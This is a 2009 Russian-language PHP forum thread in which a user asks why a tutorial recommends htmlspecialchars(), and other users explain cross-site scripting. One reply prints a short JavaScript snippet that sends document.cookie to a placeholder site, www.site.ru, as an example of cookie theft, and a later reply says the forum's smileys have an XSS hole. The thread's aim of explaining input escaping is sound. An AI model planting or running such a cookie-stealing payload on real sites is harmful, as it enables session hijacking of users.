Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Социальная инженерия и социальные хакеры. Авторы: Кузнецов М.В., Симдянов И.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель MySQL 5. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: проясните ситуацию
 
 автор: vrazbros   (14.03.2009 в 16:36)   письмо автору
 
 

прочитал про htmlspecialchars() на http://www.softtime.ru/bookphp/gl3_2.php
в конце -> Как понимаете, "приветик" может быть совсем не таким безобидным.

не понимаю :) чем таким javascript может угрожать людям ? :)

заранее спасибо

  Ответить  
 
 автор: Mookapek   (14.03.2009 в 16:49)   письмо автору
 
   для: vrazbros   (14.03.2009 в 16:36)
 

С помощью javascript можно красть cookies и перенаправлять пользователей на другой сайт.

  Ответить  
 
 автор: vrazbros   (14.03.2009 в 16:59)   письмо автору
 
   для: Mookapek   (14.03.2009 в 16:49)
 

что то слобо верится чтобы с помошью javasscript можно украсть cookies....

  Ответить  
 
 автор: sim5   (14.03.2009 в 17:02)   письмо автору
 
   для: vrazbros   (14.03.2009 в 16:59)
 

А почему не вериться? И то и другое у клиента.

  Ответить  
 
 автор: vrazbros   (14.03.2009 в 17:14)   письмо автору
 
   для: sim5   (14.03.2009 в 17:02)
 

Просто для этого нужно как я понимаю присвоить кукисы клиента какойто переменной, потом ее сохранить в базе или отправить куда то по почте чтобы потом воспользоваться, а это уже php и если javascript кто то и вставит мне в гостевую книгу, то php он туда точно не вставит….я надеюсь :)

или я что то упустил ?

  Ответить  
 
 автор: Mookapek   (14.03.2009 в 17:20)   письмо автору
 
   для: vrazbros   (14.03.2009 в 17:14)
 

Вот такой код -
<script>
location.href='http://www.site.ru/index.php?cookie='+escape(document.cookie);
</script>

- будет извлекать cookies и отправлять на сайт www.site.ru.

Этот код может прийти во входящих данных, поэтому надо обрабатывать их с помощью функции htmlspecialchars().

  Ответить  
 
 автор: vrazbros   (14.03.2009 в 17:42)   письмо автору
 
   для: Mookapek   (14.03.2009 в 17:20)
 

я в шоке

  Ответить  
 
 автор: Zend72   (16.03.2009 в 19:39)   письмо автору
 
   для: vrazbros   (14.03.2009 в 17:42)
 

Про XSS атаки слышали что нибудь? :)

PS
Кстати на этом форуме в смайликах XSS есть...

  Ответить  
 
 автор: sim5   (14.03.2009 в 17:42)   письмо автору
 
   для: vrazbros   (14.03.2009 в 17:14)
 

JS сценарий (будем говорить о "вредном случае") запущенный от имени домена вашего, спокойно извлекет куки (а с ними он работать может), и, если надо, выпотрошит из них необходимое, и спокойно отошлет по назначению. А вот там где их "ждут", там уже РНР, но это уже другая история.

  Ответить  
 
 автор: Slo_Nik   (14.03.2009 в 17:20)   письмо автору
 
   для: vrazbros   (14.03.2009 в 16:36)
 

>не понимаю :) чем таким javascript может угрожать людям ? :)

таким ни чем угрожать не сможет, а вот если дописать этот скрипт правильно, как я понимаю, то можно натворить бед...
ведь всё это было написано для примера...
попроси знающих людей, пусть тебе покажут полностью скрипт, при помощи которого можно что то сделать плохое...
если такие найдутся и согласятся :)
p.s. было бы самому интересно посмотреть на такой скрипт, в javascript не разбираюсь, потому сам не сделаю....

p.s. вот, уже показали :):):):)

  Ответить  
 
 автор: vrazbros   (14.03.2009 в 18:30)   письмо автору
 
   для: Slo_Nik   (14.03.2009 в 17:20)
 

те если я соглашусь на предложение FF сохранить пароли от доступа на сайт mysite.ru и недайбог попаду на сайт с таким js кодом то все мои пароли окажутся у злобного хакера ? :)
В не зависимости FF или IE ?

  Ответить  
 
 автор: cheops   (16.03.2009 в 17:01)   письмо автору
 
   для: vrazbros   (14.03.2009 в 18:30)
 

Да, могут.

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования